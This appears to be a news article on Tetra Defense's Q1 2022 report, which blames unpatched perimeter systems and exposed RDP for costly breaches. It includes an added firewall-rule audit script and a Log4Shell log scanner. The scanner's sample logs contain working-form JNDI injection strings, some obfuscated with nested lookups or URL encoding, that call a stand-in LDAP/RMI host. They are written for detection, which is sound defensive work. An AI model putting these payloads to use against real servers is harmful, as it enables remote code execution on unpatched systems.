Tetra Defense: Unpatched Systems Behind Costliest Cyberattacks in Q1
Log4J/Log4Shell is still being actively exploited.
![Software patch Software patch](https://eu-images.contentstack.com/v3/assets/blt10e444bce2d36aa8/blt7e236dba0bdd7214/652422f5cee0130405673a21/3-Software-Patch-1.jpg?width=700&auto=webp&quality=80&disable=upscale)
Shutterstock
During the first quarter, 82% of the incidents Tetra Defense responded to were caused by an external exposure: either a known vulnerability on the victim’s network perimeter or a remote desktop protocol (RDP) service reachable from the internet.
Tetra Defense classifies external exposures in two ways:
External vulnerabilities, which could have been mitigated through publicly available security patches and software updates. In these instances, a threat actor utilized a known vulnerability to gain access to the network before the internal organization was able to patch the system. In the first quarter, 57% of total incidents were caused by the exploitation of external vulnerabilities.
Risky external exposures, which are IT practices such as leaving an RDP port open to the public internet. These behaviors are considered risky because the mitigation relies on an organization’s continued security vigilance and willingness to enforce consistent standards over long periods of time. In the first quarter, 25% of total incidents Tetra Defense handled were caused by risky external exposures.
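The "risky external exposure" category above is the kind of thing a periodic configuration audit can catch before an attacker does. The following is an added example, not code from Tetra Defense or Arctic Wolf: a Python check over a vendor-neutral list of inbound firewall or security-group rules that flags any rule allowing RDP (the case the report calls out) or a few other remote-administration ports this example adds (SMB, WinRM) from sources outside a constructed allow-list of internal and VPN ranges. The rule format, the trusted ranges and the sample rules are all assumptions made for the example. It deliberately treats a port range or an "all protocols" rule that happens to include 3389 the same as an explicit RDP rule, which is where such exposures often hide.

```python
import ipaddress
from typing import Iterable

# Ports that should never be reachable from outside the organisation's own
# address space. RDP is the case the report calls out; the others are this
# example's own additions.
RISKY_PORTS = {3389: "RDP", 445: "SMB", 5985: "WinRM", 5986: "WinRM-HTTPS"}

# Hypothetical allow-list of internal and VPN ranges (assumed for the example).
TRUSTED_SOURCES = [
    ipaddress.ip_network(c) for c in ("10.0.0.0/8", "192.168.0.0/16", "fd00::/8")
]

# Constructed sample rules in a vendor-neutral shape (not from any real cloud
# API or from the report). proto "-1" means "all protocols", as some vendors use.
SAMPLE_RULES = [
    {"id": "sg-web-https",   "proto": "tcp",  "from": 443,  "to": 443,   "src": "0.0.0.0/0"},
    {"id": "sg-rdp-any",     "proto": "tcp",  "from": 3389, "to": 3389,  "src": "0.0.0.0/0"},
    {"id": "sg-rdp-vpn",     "proto": "tcp",  "from": 3389, "to": 3389,  "src": "10.20.0.0/16"},
    {"id": "sg-admin-range", "proto": "tcp",  "from": 3000, "to": 4000,  "src": "203.0.113.0/24"},
    {"id": "sg-allow-all",   "proto": "-1",   "from": 0,    "to": 65535, "src": "::/0"},
    {"id": "sg-smb-office",  "proto": "tcp",  "from": 445,  "to": 445,   "src": "192.168.1.0/24"},
    {"id": "sg-icmp-any",    "proto": "icmp", "from": -1,   "to": -1,    "src": "0.0.0.0/0"},
]


def is_trusted_source(cidr: str) -> bool:
    """True only if the whole source range sits inside one trusted range.

    Version is compared first because subnet_of() raises on a v4/v6 mismatch.
    """
    net = ipaddress.ip_network(cidr, strict=False)
    return any(net.version == t.version and net.subnet_of(t) for t in TRUSTED_SOURCES)


def is_internet_wide(cidr: str) -> bool:
    """0.0.0.0/0 or ::/0, i.e. open to everyone."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def risky_ports_in_rule(rule: dict) -> dict:
    """Return {port: service} for every risky port the rule's port range covers."""
    if rule["proto"] == "icmp":
        return {}
    if rule["proto"] in ("-1", "all"):
        lo, hi = 0, 65535          # "all protocols" implies every port
    else:
        lo, hi = rule["from"], rule["to"]
    return {p: name for p, name in RISKY_PORTS.items() if lo <= p <= hi}


def find_risky_exposures(rules: Iterable[dict]) -> list:
    """List rules that expose a risky port to a source outside the allow-list."""
    findings = []
    for rule in rules:
        if is_trusted_source(rule["src"]):
            continue
        ports = risky_ports_in_rule(rule)
        if not ports:
            continue
        findings.append({
            "id": rule["id"],
            "src": rule["src"],
            "services": sorted(ports.values()),
            "internet_wide": is_internet_wide(rule["src"]),
        })
    # Internet-wide exposures first, then by rule id for stable output.
    findings.sort(key=lambda f: (not f["internet_wide"], f["id"]))
    return findings


if __name__ == "__main__":
    for f in find_risky_exposures(SAMPLE_RULES):
        scope = "INTERNET" if f["internet_wide"] else "untrusted range"
        print(f'{f["id"]}: {", ".join(f["services"])} reachable from {f["src"]} ({scope})')
```

Run against the constructed rules, the check reports `sg-allow-all` and `sg-rdp-any` as internet-wide exposures and `sg-admin-range` as RDP reachable from an untrusted range, while the VPN-scoped RDP rule and the office-only SMB rule pass. The allow-list approach is preferable to asking the `ipaddress` module whether a source is "private": that property also covers documentation ranges and says nothing about which public ranges the organization actually controls.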
Incidents caused by unpatched systems cost organizations 54% more than those caused by employee error, according to Tetra Defense.
The most common incidents, those with the root point of compromise (RPOC) linked to an externally facing vulnerability, are also the most expensive to recover from. The cost of an incident response engagement can vary wildly based on the size of the organization and scope of the incident response activities.
Typically, organizations don’t have the ability to test patching outside of their production environment, said Arctic Wolf’s Scott Holewinski.
“It is not uncommon for IT departments to delay patching in fear of impacting production, and business owners will often accept the risk that is associated with it,” he said. “Patching isn’t a one-and-done. It’s a task that requires constant maintenance and monitoring. Unfortunately, as IT and security teams are spread thin, patching often falls by the wayside. Patching is integral to protection against exploits. As soon as a proof of concept (PoC) is made public on the dark web or more legitimate forums like GitHub, most vendors will develop a patch. It’s critical to stay on top of guidance from industry organizations like (ISC)2 or federal authorities like the Cybersecurity and Infrastructure Security Agency (CISA) to prioritize the exploits that pose the highest risk to your organization.”
Log4J/Log4Shell is still being actively exploited, but the significant global attention paid to the vulnerability has limited ongoing widespread exploitation, according to Tetra Defense.
Despite widespread attention brought to Log4J/Log4Shell vulnerabilities last December, as the calendar ticked forward into the new year, it was only the third most exploited external exposure in the quarter, accounting for 22% of Tetra Defense’s total incident response cases. Leading the way, and accounting for 33% of cases, were a series of Microsoft Exchange vulnerabilities known as ProxyShell, which were originally disclosed in August 2021.
“The most common system we see the Log4J vulnerability exploited on is VMware Horizon,” Holewinski said. “This is not because the attackers know exactly how to trigger the Log4J exploit on VMware Horizon, which makes it a repeatable process. Anyone who hasn’t fully updated Log4J to a non-vulnerable version is still at risk. That level of risk depends on how readily exploitable the outdated system is.”
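Since the report says Log4Shell is still being exploited, it is worth showing what a detection for it has to cope with: attackers rarely send the literal `${jndi:...}` string, they wrap it in Log4j's own lookup syntax (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and often URL-encode the result. The following Python scanner is an added example, not from the report or from Arctic Wolf. It URL-decodes each line, collapses nested lookups the way Log4j would resolve them (a simplified model: only `lower`, `upper` and default-value lookups are modelled, and any other lookup resolves to an empty string), and then looks for a JNDI lookup and reports its scheme. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further $, { or }.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with its scheme (ldap, ldaps, rmi, dns, ...), matched after normalisation.
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):", re.IGNORECASE)
MAX_ROUNDS = 20  # bound the inner-to-outer resolution for pathological input

# Constructed access-log lines (documentation-range IPs, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jan/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [15/Jan/2022:10:01:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:rmi}://203.0.113.5:1099/b}"',
    '198.51.100.11 - - [15/Jan/2022:10:01:05 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D'
    '%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F203.0.113.5%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.12 - - [15/Jan/2022:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${sys:user.home}"',
]


def _resolve_lookup(match: "re.Match") -> str:
    """Resolve one innermost lookup the way Log4j would (simplified model)."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)               # keep the payload itself for the final check
    if ":-" in body:                        # ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    key, _, arg = body.partition(":")
    key = key.lower()
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    return ""                               # sys:, env: without default, etc. collapse to nothing


def normalize(text: str) -> str:
    """URL-decode, then repeatedly resolve innermost lookups until stable."""
    text = unquote(text)
    for _ in range(MAX_ROUNDS):
        new = LOOKUP.sub(_resolve_lookup, text)
        if new == text:
            break
        text = new
    return text


def scan_line(line: str):
    """Return a finding dict for a JNDI lookup in the line, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "normalized": norm[m.start():m.start() + 80]}


def scan_log(lines) -> list:
    """Scan every line; findings carry the 1-based line number."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            findings.append({"line_no": line_no, **hit})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'line {hit["line_no"]}: jndi via {hit["scheme"]} -> {hit["normalized"]}')
```

On the constructed lines the scanner flags lines 2, 3 and 4 (schemes ldap, rmi, ldap) and ignores line 5, which contains a Log4j lookup but no JNDI lookup. Matching on the raw bytes for `${jndi:` alone would have caught only line 2. In a real deployment this belongs on the fields Log4j actually logs (User-Agent, request path, headers, form fields) and is a stop-gap for systems that have not yet been upgraded to a non-vulnerable Log4j version.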
Compromised credentials still account for a number of incidents, underscoring the need for more organizations to adopt MFA and implement dark web monitoring, according to Tetra Defense.
In some instances, these incidents result from threat actors brute-forcing username and password combinations against exposed systems. But in many cases, password reuse is to blame: employees use the same username and password across multiple sites, so when one of those sites is breached and the credentials are leaked to the dark web, the same pair can be used to compromise every other system where it is reused.
With MFA in place, exploitation of compromised credentials becomes more challenging because even if a threat actor has a known username and password pair, the account remains inaccessible without a second factor of authentication such as an app push notification, text message or security challenge question.
Across Tetra Defense’s cases and all publicly observed attacks by e-crime groups on the dark web, there was, unsurprisingly, a diverse set of threat actor groups. That so many groups are active at once highlights the constant challenge organizations face in protecting themselves: even if one group goes quiet or is taken down by law enforcement, dozens of others remain actively trying to compromise them.
“Vulnerabilities will likely continue to be highly exploited as the RPOC,” Holewinski said. “Over the last five years, the vulnerabilities may have changed, but externally accessible vulnerabilities overall will continue to be a favorite attack vector for threat actors.”
Aimei Wei is CTO and co-founder of Stellar Cyber. She said patching definitely pays off for known vulnerabilities and it greatly reduces the attack surface.
“However, it is hard to guarantee that the patch is always immediately available for the software version you are using and can be applied in time,” she said. “[An] organization’s continued security vigilance and enforcement of standards can dramatically reduce the chances for exploitation from exposed risks. However, the exposed risk, even for a short period of time, may still be exploited. Having a detection and response system that can continuously monitor the environment, detect the exploitation and stop the attack from progression to an incident covers the cases missed by not in-time patch or not consistent enforcement, or short period of time for exposed risks.”
Mark Bower is vice president of product management at Anjuna Security.
“The report once again highlights the simple fact that in an ideal world, enterprises would patch and monitor untrusted compute and networks to keep data safe from leakage,” he said. “But in truth, it’s impossible to continuously down tools and close all risk gaps that affect modern business success. Vulnerabilities exist because they are discovered. But until that point, they are also exploitable holes in systems or processes. However, modern computing today is beginning to provide fresh new approaches to address risks like this. And we will start to see that at scale and in short order with compute ecosystems that shrink attack surfaces inherently for data at rest, in motion and in use.”
Unpatched systems – not employee error – prompted the most costly cyberattacks during the first quarter of 2022.
That’s according to a new Q1 2022 report by Tetra Defense, an Arctic Wolf company. Each quarter, Arctic Wolf‘s Tetra Defense collects and analyzes data and insights from its incident response engagements in the United States.
Scott Holewinski is Arctic Wolf‘s senior vice president and general manager of incident response.
“User action is often touted in the media as a top point of compromise, with the fear-mongering attached,” he said. “Reports that someone from HR clicked on a link and single-handedly invited a ransomware attack into their organization are a cautionary tale used by many vendors and employers alike to articulate the consequences of a simple user action.”
User action can be a piece of a threat actor’s strategy, Holewinski said. However, it’s not the easiest way in, nor is it the most popular.
Encouraging Findings
Holewinski said there are a lot of encouraging findings in this report.
“The most significant is that 82% of major cyber incidents are preventable by making sure your organization does not have any vulnerabilities on the perimeter of the network and does not allow external remote desktop protocol (RDP) access directly to workstations or servers,” he said. “If you combine that with using multifactor authentication (MFA), user awareness training, and some level of managed detection and response, your organization will no longer be low-hanging fruit for a major cyber incident. A lot of these are economical to implement. Other than the people time, patching vulnerabilities is usually free.”